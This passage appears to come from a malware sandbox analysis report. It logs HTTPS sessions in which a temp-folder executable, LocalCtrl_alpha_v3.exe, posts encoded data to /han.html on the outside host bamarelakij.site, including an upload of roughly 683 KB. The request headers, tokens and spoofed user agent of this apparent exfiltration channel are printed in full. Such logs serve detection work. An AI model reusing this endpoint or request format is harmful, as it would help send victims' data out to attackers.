2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 11 02 ec 08 34 59 33 0c 65 9b b6 a7 b7 51 c9 59 15 17 b9 b8 36 b4 3a b2 04 00 51 0a e1 09 0f 00 e4 0e 16 11 02 e4 04 73 59 e1 09 df f9 2c 2e 2f d8 e3 1d 04 00 71 0e b1 02 0f 00 e4 0e 16 11 02 e4 04 72 59 b1 02 45 2f 34 7f b7 0a fb 4c 06 00 91 0e f5 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 f5 0b 65 9b b6 a7 b7 51 c9 59 2b b4 b2 bb b2 39 08 00 d8 0c 5a 0f 13 00 eb 0e 16 11 02 eb 08 9a 59 5a 0f c4 f8 d0 16 6d 6a 27 5c 35 66 4f 71 51 59 61 af 04 00 a2 0c 14 09 0f 00 e4 0e 16 11 02 e4 04 72 59 14 09 06 73 70 1d f6 b7 4a 2b 05 00 62 0f 01 01 13 00 ec 0e 16 11 02 ec 08 76 59 01 01 65 9b b6 a7 b7 51 c9 59 15 17 36 32 31 25 00 40 0e b7 04 13 00 ec 0e 16 11 02 ec 08 76 59 b7 04 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a Data Ascii: 4Y3eQY6:QsY,./qrYE/4LYeQY+9ZYZmj'\5fOqQYarYspJ+bvYeQY621%@vYeQY93:.2.886:
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 02 ec 08 34 59 d1 05 65 9b b6 a7 b7 51 c9 59 24 b4 b9 3a b7 39 bc 04 00 d2 0b 8a 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 8a 0a 34 5e 90 bc c4 7b 5f 8f 08 00 a7 05 04 0f 13 00 eb 0e 16 11 02 eb 08 76 59 04 0f 95 12 0b 84 ba 02 75 3e b8 89 94 e3 86 31 33 cd 04 00 f5 03 34 05 0f 00 e4 0e 16 11 02 e4 04 72 59 34 05 69 42 1a 51 99 67 d5 62 08 00 25 07 5d 0e 13 00 eb 0e 16 11 02 eb 08 34 59 5d 0e 6a 12 61 4e 88 ae 7f b6 9b 8c fe 29 b4 9d 39 45 08 00 1e 03 e9 09 13 00 eb 0e 16 11 02 eb 08 9a 59 e9 09 dd d5 39 9b bd 27 28 fd 2c 4b a6 fc 81 14 6e 0e 04 00 10 07 74 0b 0f 00 e4 0e 16 11 02 e4 04 72 59 74 0b e6 76 8b fb 16 53 44 c8 04 00 c8 01 9f 01 0f 00 e4 0e 16 11 02 e4 04 72 59 9f 01 c7 17 73 5c 36 32 bc 6f 08 00 11 04 ce 00 13 00 eb 0e 16 11 02 eb 08 34 59 ce 00 be Data Ascii: 4YeQY$:9rY4^{_vYu>134rY4iBQgb%]4Y]jaN)9EY9'(,KntrYtvSDrYs\62o4Y
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 00 ec 0e 16 11 02 ec 08 34 59 04 03 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 ba 3a 36 b7 b7 b5 04 00 be 0b e8 09 0f 00 e4 0e 16 11 02 e4 04 76 59 e8 09 f8 a5 d3 7c 08 61 e9 4a 1d 00 66 09 02 08 13 00 ec 0e 16 11 02 ec 08 73 59 02 08 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a9 3a b0 31 36 b2 2e b5 b2 bc 04 00 47 06 a0 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 a0 0f a5 f3 2d 12 54 d6 e2 21 04 00 ed 03 21 0f 0f 00 e4 0e 16 11 02 e4 04 72 59 21 0f f2 f7 51 80 02 d6 9e b3 24 00 51 0b 4f 0a 13 00 ec 0e 16 11 02 ec 08 76 59 4f 0a 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 05 00 dd 0a f6 07 13 00 ec 0e 16 11 02 ec 08 34 59 f6 Data Ascii: 4YeQY93:.:6vY\|aJfsYeQY79."92.:16.G4Y-T!!rY!Q$QOvYOeQY6.49.886:7.49<4Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	50088	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:32 UTC	425	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 53 Host: bamarelakij.site
2025-01-09 13:56:32 UTC	53	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:56:32 UTC	747	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:56:32 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THgonuw8w7S%2Bnr4CEWpyVtROj2NU25bRZVTQjLSyBLBX90xlf57PI1dIS9m8sv3pMbHsdUqHSxQTFKxlMZxBOytEoxe15syaxYCo2JlQxAyQXB%2FLb06NDE8L033ni645RV38"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee673b657289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20407&min_rtt=2451&rtt_var=11768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1114&delivery_rate=1191350&cwnd=238&unsent_bytes=0&cid=d65fa4154f3b2bdc&ts=554&x=0"
2025-01-09 13:56:32 UTC	29	IN	Data Raw: 31 37 0d 0a 07 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 91 ce 2c 3d 05 b5 0d 0a Data Ascii: 17,=
2025-01-09 13:56:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	50089	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:32 UTC	429	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 683391 Host: bamarelakij.site
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 dd 16 0a 00 08 00 00 00 52 00 00 00 fd 04 e9 09 95 a7 40 16 d7 35 c9 59 81 81 00 00 00 00 00 00 00 00 00 00 fe 02 f4 84 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 99 a1 1d 2e aa b9 b2 39 b9 2e 31 39 b7 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 9d a1 1d 2e aa b9 b2 39 b9 2e 31 39 b7 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0 ec 98 Data Ascii: R@5Y`HIL`HS49.9.19.88":.&6.6.49.9":`H"36:.9.19.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 39 31 18 2c 37 b0 2b 95 b2 a0 35 b9 b3 a0 21 bb b6 31 a6 18 27 1a b5 a1 3c a8 ba 19 a3 31 b7 9b 39 b1 bc ac 95 33 25 a3 a1 21 31 ba a9 32 24 35 95 27 b1 b6 2d b7 31 9a a3 97 9a 99 99 28 2d 21 a9 39 b3 a0 2c 3d 18 23 a5 b5 38 ba 37 25 9a ba 38 9b aa 38 a2 37 27 b6 a7 a1 ba ac a7 bc b1 b8 21 39 25 a5 95 b6 a3 bb 2d 2d 28 bb a7 1a 1c 1a b2 b9 a3 2b a6 b0 95 22 18 99 a0 18 99 25 a8 3b a7 3c aa a4 b6 21 b0 2b 24 39 a5 31 31 ac 21 19 aa 35 34 23 a3 21 33 31 a3 18 25 24 a0 99 35 b3 b3 a5 39 a0 99 a0 aa b6 a7 a8 bb b7 ba 1a a3 b0 3d 21 9c 3c 3d ba b9 97 1c 9a 24 b6 18 a4 97 31 b2 24 3a a9 3a 1a a6 b7 a9 3b a8 bb 33 a7 3d 25 9a 95 a5 a9 a5 33 a9 29 9c 3a ac b6 3d 22 1a b0 2b 3a 98 19 a5 36 2b b0 b2 1c a1 3a 3a 2b a7 a6 a4 a2 2b a8 1b 24 b8 39 b9 29 3d 9a 34 97 b1 Data Ascii: 91,7+5!1'<193%!12$5'-1(-!9,=#87%887'!9%--(+"%;<!+$911!54#!31%$59=!<=$1$::;3=%3):="+:6+::++$9)=4
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 23 a1 33 24 35 34 37 b6 32 95 1c 3b bc 1b 18 9b 97 1a 98 38 95 99 b7 a2 b8 b2 36 33 25 2b b1 b8 3a b8 26 b0 b9 2a 3c 39 24 2d 1b 29 36 27 31 b0 a4 b2 34 a9 35 b5 2d 21 2d 33 9a 31 3d a7 28 1a 2d 95 a2 9c 35 ba b9 b6 a0 33 a1 a1 2c 3d a8 3d b1 9c b7 25 a8 b4 1a 1b 2d 98 1b 99 a8 23 31 24 a2 29 a5 34 b7 b1 34 29 b7 a8 23 9c 9c ba a8 9c a8 1c a4 1b 24 a5 1a 2a 29 9b a5 26 2a 22 bc bc 2a 99 9a b2 99 b3 bc ba a7 a3 34 34 26 3b 2a b6 3b ab b7 b7 1b 3d 18 aa 28 21 a7 1c 21 1b 3b 1c 99 9c 23 25 9b 1a 23 b8 9c 99 a2 aa a6 25 a2 b4 34 21 b3 b7 1c bc a1 24 25 21 b3 b7 1c 3c a1 28 25 21 b3 39 b9 2d 21 a4 aa b3 bb 2a 18 a6 b3 b6 a5 a8 1a a7 a6 a6 b3 b9 a2 b3 bb a9 b1 ac 21 a5 aa b3 bb a9 b1 2d 21 a2 27 21 b3 b5 95 9a 21 22 3b 21 34 b7 1b b4 a6 b5 a3 a5 b2 98 b5 aa 36 Data Ascii: #3$5472;863%+:&<9$-)6'145-!-31=(-53,==%-#1$)44)#$)&"44&;;=(!!;#%#%4!$%!<(%!9-!!-!'!!";!46
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: ac 1b a4 38 1c 36 29 25 95 95 aa aa 35 b1 a4 3d bc b5 27 ac 21 b0 19 3d 25 2c 37 3d 1a 38 23 b1 b9 21 25 a7 b1 b2 a6 b5 ba b6 1b b1 a5 34 3d 39 38 98 32 ba 3d 21 2a 37 a2 3a 19 36 98 b8 36 9c a4 98 aa 9b 33 37 b5 a1 97 39 a6 38 26 ac 19 aa 3c b1 23 1c 36 21 31 aa 1b ba ab 2d a8 a9 2d b8 a0 39 9c a9 38 b1 95 a3 a1 24 24 24 a9 38 28 a8 b2 ab 9a b8 28 98 a2 a0 26 ab 99 37 34 ba 97 aa 21 b6 b7 9c 1a b8 1a 1c b9 a5 b9 19 a1 39 31 9c a1 9a 2c a4 a6 98 bc 1c aa 38 b3 3b 33 b1 1a 39 21 b2 b8 a4 1a ac b0 39 b0 18 2c a5 3a b6 29 a4 36 99 b3 1b 3b 24 33 29 1b 37 b7 31 b5 98 b6 2b bb b2 37 2d bc b1 29 2d b5 97 99 19 33 aa b4 1a a5 35 a8 2a 1a ba aa 22 b6 ba b2 aa b3 39 9c 36 23 3c 24 a7 a7 9b b9 a1 a3 1a b1 9c b6 3a b4 3d b5 34 19 2a b0 bc 28 34 31 b9 b6 9a b9 ac 2a Data Ascii: 86)%5='!=%,7=8#!%4=982=!7:663798&<#6!1--98$$$8((&74!91,8;39!9,:)6;$3)71+7-)-35"96#<$:=4(41
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 23 33 2a 39 a6 27 b6 24 36 aa 21 37 26 19 35 9b a4 a9 b5 3d 21 19 34 22 19 aa b5 b2 27 28 ac 2c 18 a7 a8 1c 29 3b b0 9a 9b 98 b7 a4 25 34 2c a6 1b 28 b0 1b 9b b6 22 18 a5 a2 1b a9 b6 28 32 ba 29 b7 9c b9 34 22 3d a1 9b 98 ac a4 19 9c b3 99 19 21 ba 9b 95 35 ac ba 39 a6 b3 ac a3 2c 31 ba ac 2b 34 3c 95 1c 34 a7 95 99 b0 a3 23 a9 9b a8 b1 a3 b9 24 b3 bc 1b 2b 9b bc a7 9b 23 b7 bb 36 97 a8 2c 32 ab 26 aa 2c a4 b8 37 b8 39 39 9a 98 97 27 a4 35 34 23 a0 28 a6 2d 98 36 1b 3b b4 b4 26 a7 a0 23 b8 24 3d b4 2a a4 3d 9c a8 97 98 2d 34 a7 3b 97 1a 33 38 97 ba 28 1a 33 39 3b 95 24 1b 97 97 34 95 37 95 1a 97 34 95 ba 97 1a 33 39 97 95 24 1b 33 9b 35 95 24 1b 9b 97 34 95 3b 97 1a 33 38 97 ba 28 1a 33 39 3b 95 24 1b 97 97 34 95 37 95 1a 97 34 95 ba 97 1a 33 39 97 95 24 Data Ascii: #39'$6!7&5=!4"'(,);%4,("(2)4"=!59,1+4<4#$+#6,2&,799'54#(-6;&#$==-4;38(39;$47439$35$4;38(39;$47439$
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: aa 1b aa 36 b9 bb 9c 24 b0 97 2d 2d 19 23 99 32 1b b9 ac b4 b6 26 a1 36 39 23 2d 1b a3 36 b8 24 b4 99 95 ab 9c 38 29 37 1c 2a 35 a1 a1 b4 b0 25 ba 23 29 2a 21 a5 bb 99 a1 18 a2 2c 33 22 29 a7 3c 3a 1b ab aa b5 a3 a4 33 99 b4 18 ac 28 3c 97 33 a0 29 3c a6 19 21 a6 b1 35 22 95 32 23 a6 2a b4 a5 b5 9b 37 a1 2d 2c 97 b9 b5 22 a6 1c b7 3a 23 b7 b5 bc b7 b6 a1 a2 39 b4 a8 1b 9a 3d aa aa 27 b6 97 31 22 1a b7 29 25 24 a3 19 3d b7 28 b0 35 21 32 35 26 a6 99 31 1b a8 a4 29 36 a2 b4 b9 9c a5 a7 24 b0 a2 2a 1b 31 b1 b1 b4 28 1a 2a 38 b1 31 a2 a9 a7 99 99 a4 29 bb bc b4 25 a7 24 25 3c b3 a2 38 9c a2 b4 b7 2b b8 a0 b0 97 a4 23 2d 25 ac 3b ac b7 19 37 19 b8 27 a3 29 aa 97 37 99 a2 27 a9 1c ab 35 ac b7 23 a3 b3 18 2a 22 1a b4 ba 38 19 a3 24 3c a1 37 1c 28 37 3b ab 26 ba Data Ascii: 6$--#2&69#-6$8)75%#)!,3")<:3(<3)<!5"2#7-,":#9='1")%$=(5!25&1)6$1(81)%$%<8+#-%;7')7'5#"8$<7(7;&
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 2d bb 9a 23 39 a0 2d 25 a1 ac b5 2b 2c 3d 21 9c a6 36 a2 a9 25 9c 1a ab 9a a0 31 9c 9a 26 18 3d 21 9c 37 29 21 a4 1c 38 19 38 2c bc a2 25 22 99 a4 b7 2c b3 bb 3b 35 b7 19 22 97 1a b8 31 ab b1 35 b3 33 2b 9c a0 98 98 a9 26 18 b9 1b b3 ab 1a a6 b3 2b 24 38 27 1c a6 b2 b1 18 31 98 3b b6 26 a2 b3 b4 b7 a5 b3 23 a9 a8 a8 21 31 18 a2 a9 b3 bc 29 24 a4 b4 19 1b b2 35 a3 3a a2 32 b9 a0 21 24 b1 18 b6 1b a1 32 a9 19 1a b1 a1 36 a9 9c 29 a5 34 bc 28 a1 b7 19 25 b8 b4 a9 b4 98 bc 34 b6 38 b9 b7 2b 27 a0 2d 29 ba a9 22 b4 3c 2b ba 28 3d 22 b5 b6 b1 27 9a 24 2c 3c 21 31 2b 99 29 b1 a5 2d b9 29 aa a6 35 a1 95 1c 24 b0 26 a0 3a 9c bc b3 1b 1b 3b 25 2c 21 9b 3a 1c 99 36 a7 3a 29 a7 23 1a 9c 36 32 21 a5 b8 b1 a0 b7 33 b7 36 a1 38 29 2c 3b 18 29 29 b4 3a aa 3b b1 32 34 bc Data Ascii: -#9-%+,=!6%1&=!7)!88,%",;5"153+&+$8'1;&#!1)$5:2!$26)4(%48+'-)"<+(="'$,<!1+)-)5$&:;%,!:6:)#62!368),;)):;24
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 9c 95 32 b0 2c a0 a6 2c a0 28 38 a4 9c 3c 3a b5 18 2b b1 bc 2a bc a1 a4 a5 2b 3a 23 2d 9c ba ba 18 bc 34 b2 b8 3a b0 39 9b 32 2b b4 3d a9 ac 27 2d b5 9a ba 37 2b a0 b9 2a b4 b6 b1 b1 25 34 34 29 99 b6 b0 99 aa ab 1a a3 24 3d 1c 3c a2 a9 a7 3b 1a 3b 37 21 a7 b5 a3 ab 21 9a aa ba b8 9c 31 25 9a 28 39 39 2d a7 32 b8 35 b1 19 a8 3c 22 b6 2a 35 22 99 19 a8 b0 bb 3b 1b b2 9a ac 9a 36 27 35 a6 a1 32 b2 9a bc 9a 99 19 37 2c 26 3d bc 26 34 b9 b6 29 34 3b a8 b1 19 9a 28 b1 19 24 9a ba 9c 26 b7 ac 95 99 ba 29 29 a2 aa a9 23 aa 37 aa ba b4 2c b8 a5 27 3a 26 a2 a6 1c 27 3b 32 26 b9 b4 9c 2d 97 19 b2 33 39 b2 24 3c 95 ba 34 9c b0 19 ac 9a 24 b5 31 28 9a 2c b3 22 33 99 3c 97 3c 33 b1 2a 99 b6 1c 35 99 39 19 aa b2 1b a1 2b b4 b9 38 36 a6 1a 31 b6 2d 37 a8 33 95 98 97 a6 Data Ascii: 2,,(8<:++:#-4:92+='-7+%44)$=<;;7!!1%(99-25<"5";6'527,&=&4)4;($&))#7,':&';2&-39$<4$1(,"3<<359+861-73
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: 39 35 a2 3c 19 b0 27 a0 a8 b5 a9 36 b5 a0 b2 1a 25 ba a0 b1 b8 b6 3b 35 35 1a 24 a4 32 3d a0 a3 25 98 b4 29 21 a6 21 23 26 a0 bc 25 2b b9 99 a1 21 b7 b0 a9 a0 a0 a8 27 ba a6 a9 b3 a3 a1 bc 2a 22 b4 a8 26 a1 21 21 27 a7 22 b1 a8 a9 22 2a a6 a8 33 ba a1 27 31 a5 26 a0 2c a8 2c 95 a7 a6 a4 23 b4 25 32 34 33 34 29 1a b8 a5 b7 a6 18 29 2b a9 b6 a0 ab b4 27 36 18 bb 22 22 a7 33 a4 1c 1a a6 19 29 2b 21 a8 25 b2 22 a1 ac 2d ab 3d bc b3 b4 3a a5 a9 b5 2d 32 a0 a8 28 b4 b7 1b b0 2a 37 a2 a9 a4 34 3a b2 2c b3 3b b6 21 b0 1b b3 39 3a 9a 21 27 1a b4 33 22 b2 1a 29 b8 b5 b1 98 21 3a 1a a0 b1 38 2a aa b1 a0 99 a6 27 bb a1 ac 37 31 a4 37 b6 a2 a4 a6 34 a8 9b 31 a5 a6 a3 21 a1 b4 38 24 25 a2 23 a7 a3 2d b3 b0 37 35 b8 a6 36 a3 27 b1 23 ba b3 a0 35 ab bc 31 b1 a6 21 2c 99 Data Ascii: 95<'6%;55$2=%)!!#&%+!'"&!!'""3'1&,,#%2434))+'6""3)+!%"-=:-2(74:,;!9:!'3")!:8'71741!8$%#-756'#51!,
2025-01-09 13:56:32 UTC	15331	OUT	Data Raw: b3 2b a5 29 b1 2c aa 21 2d b8 a2 a9 18 35 23 2b 32 9a 28 bc 38 37 2a a5 19 26 bc b1 a4 a7 2d ba aa 2b 95 1c a2 b0 bc a8 26 1c 97 b3 b9 a6 97 a6 34 a6 b9 a0 3b 22 b2 a3 a4 9b b1 1a 37 27 b5 a5 98 36 2d a6 27 a9 39 3d 9a 27 2a 35 3d 3d a9 28 9c 1b 95 95 a6 b8 2a a0 2d 1b b1 ba 2c 22 25 36 31 b9 3a 3a 2c 2d 28 34 b7 a2 3b 26 2c a6 28 25 35 a6 b6 22 a0 19 a5 99 39 a7 a8 a0 b2 b6 38 18 b2 9a a6 24 a4 3b b4 b9 a0 b8 2a b9 ab 2d 34 98 36 97 1a bc 99 b8 28 ba a1 19 99 ab 19 98 1b a9 3c 32 b3 3d 37 33 a7 22 27 95 3c b8 35 97 b2 1b a5 1c 33 a3 ab 1b a2 2a 32 bc b3 28 21 3d 2d 27 32 3b 22 9b 38 b7 3c 28 2b 19 27 97 aa 3d 2a 2b a4 19 a2 97 aa 3d 35 35 24 24 34 95 25 a2 35 9b b8 28 a6 a9 36 26 98 b5 32 ac 2d 1a 99 35 b9 b3 b4 a2 3d ba 28 a8 2b 28 a0 ac 18 ac a8 ab 28 Data Ascii: +),!-5#+2(87&-+&4;"7'6-'9='5==(-,"%61::,-(4;&,(%5"98$;-46(<2=73"'<532(!=-'2;"8<(+'=+=55$$4%5(6&2-5=(+((
2025-01-09 13:56:34 UTC	808	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:34 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmSVMYBeivuwxklL%2F6SUFexN8EbefaeA3yFarQPiAlIwDceMFNDPw%2BcnSStF%2FYsbW53VVqiH%2FTbywsxQBc1xhdb3NLBptwy6xG2%2BaDRUwXRLRYSbYi22LW%2FASCw0NHiFSVCd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee6a28a2c33a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1758&rtt_var=732&sent=333&recv=684&lost=0&retrans=0&sent_bytes=2838&recv_bytes=686414&delivery_rate=1425085&cwnd=235&unsent_bytes=0&cid=293d647a1d85c604&ts=1218&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	50090	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:34 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 745 Host: bamarelakij.site
2025-01-09 13:56:34 UTC	745	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 8c 8e 68 35 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a7 00 00 00 08 00 00 00 52 00 00 00 b6 ea 41 13 95 a7 40 16 d7 35 c9 59 8a 00 00 00 00 00 00 00 00 00 00 00 5b 75 a0 89 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 31 00 Data Ascii: Rh5@5YFG4I`H1FG4(((RA@5Y[uI`I`I`P`I`P1
2025-01-09 13:56:35 UTC	792	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:35 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SuMG27Ey9OCwArxIvYXUtzSTMT91oCruKXMnBe0WqAE2NuIpne%2FjtPiIrtAJqfUrLb3l6c2LQShi0JgoYCkPCcvxGhVvNqVut6frrVirqmDiCu7OFJwpH44BmyChV2axEkPZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee75fd12185d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9928&min_rtt=1714&rtt_var=5670&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1807&delivery_rate=1703617&cwnd=238&unsent_bytes=0&cid=44938631ee3f5b31&ts=322&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	50091	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:35 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 212 Host: bamarelakij.site
2025-01-09 13:56:35 UTC	212	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 99 00 00 00 08 00 00 00 52 00 00 00 6f d2 a9 18 95 a7 40 16 d7 35 c9 59 83 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c c9 60 60 49 60 c8 00 31 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: Ro@5Yi``I`1i(((
2025-01-09 13:56:36 UTC	797	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:36 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6C6nuxbWa%2BSprIlzMRCixiR0J3Uc2K5XfI8gnXis7QMx9S2P0EQz9q39ej9pr1KTXyab84NzpNb408%2FhuxL7HqCu3%2BU%2Bu5IWhcIdhTBdzSFoZVMGVTdICZ1K7vim34DTFmw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee7bd8a9c475-EWR alt-svc: h3=":443"; ma=86400 server-timing: 